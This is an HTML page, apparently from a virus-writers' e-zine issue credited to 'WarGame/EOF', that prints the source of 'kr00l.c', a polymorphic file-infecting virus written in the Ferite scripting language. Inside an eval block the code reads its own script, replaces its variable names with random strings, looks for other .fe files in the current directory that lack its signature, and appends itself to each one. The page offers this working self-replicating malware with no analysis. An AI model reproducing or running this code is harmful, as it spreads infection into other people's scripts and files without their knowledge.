<html><head><title>EOF ISSUE #0x01</title>
<style fprolloverstyle>A:hover {color: #D1F2C4; text-decoration: none}</style></head>
<body text="#E0E0E0" bgcolor="#131313" link="#BFBFBF" vlink="#BFBFBF" alink="#BFBFBF" style="font-size: 10pt">

<pre><hr>|| Author: WarGame/EOF || <a style="text-decoration: none" href="../mainmenu/sources.htm"><span style="text-decoration: none">Back to sources</span></a> || <a style="text-decoration: none" target="_blank" href="../binsrc/WarGame/Kr00lc"><span style="text-decoration: none; color: #BFBF88">View project folder</span></a> || <hr></pre>
<pre>
uses &quot;console&quot;;
Console.println(&quot;Hi !&quot;);
eval('uses &quot;filesystem&quot;,&quot;sys&quot;,&quot;regexp&quot;,&quot;math&quot;,&quot;string&quot;,&quot;date&quot;;function HAIA(string GEFJ) { string st = File.open(GEFJ).toString(); if(String.index(st,&quot;kr00l.c by [WarGame,#eof]&quot;) != -1) {return 1;} else {return 0;}} function GJBC(number sd) { Math.srand(sd); return String.sprintf(&quot;%c%c%c%c&quot;,((Math.rand()%10)+65),((Math.rand()%10)+65),((Math.rand()%10)+65),((Math.rand()%10)+65));} string JIBH = &quot;kr00l.c by [WarGame,#eof]&quot;;string GEFJ = &quot;&quot;;string GJFG = &quot;&quot;;object pr =  File.open(Sys.scriptName());string GGFB = &quot;&quot;;object JIBB = new Directory(&quot;.&quot;); while(String.index((GJFG = pr.readln()),JIBH) == -1) {} if(1) { GJFG = Regexp.replaceAll(&quot;JIBH&quot;,GJFG,GJBC(Date.now()+1989)); GJFG = Regexp.replaceAll(&quot;GGFB&quot;,GJFG,GJBC(Date.now()+1992)); GJFG = Regexp.replaceAll(&quot;JIBB&quot;,GJFG,GJBC(Date.now()+1922)); GJFG = Regexp.replaceAll(&quot;GEFJ&quot;,GJFG,GJBC(Date.now()+1981)); GJFG = Regexp.replaceAll(&quot;HAIA&quot;,GJFG,GJBC(Date.now()+1975)); GJFG = Regexp.replaceAll(&quot;GJBC&quot;,GJFG,GJBC(Date.now()+1960));  GJFG = Regexp.replaceAll(&quot;GJFG&quot;,GJFG,GJBC(Date.now()+2006));} while((GEFJ = JIBB.getEntry()) != &quot;&quot;) { if(String.index(Sys.scriptName(),GEFJ) == -1 &amp;&amp; String.index(GEFJ,&quot;.fe&quot;) != -1) {  if(!HAIA(GEFJ)) { GGFB = File.open(GEFJ).toString(); File.remove(GEFJ); File.create(GEFJ).writeln(GGFB+GJFG); } } } ');
</pre></body></html>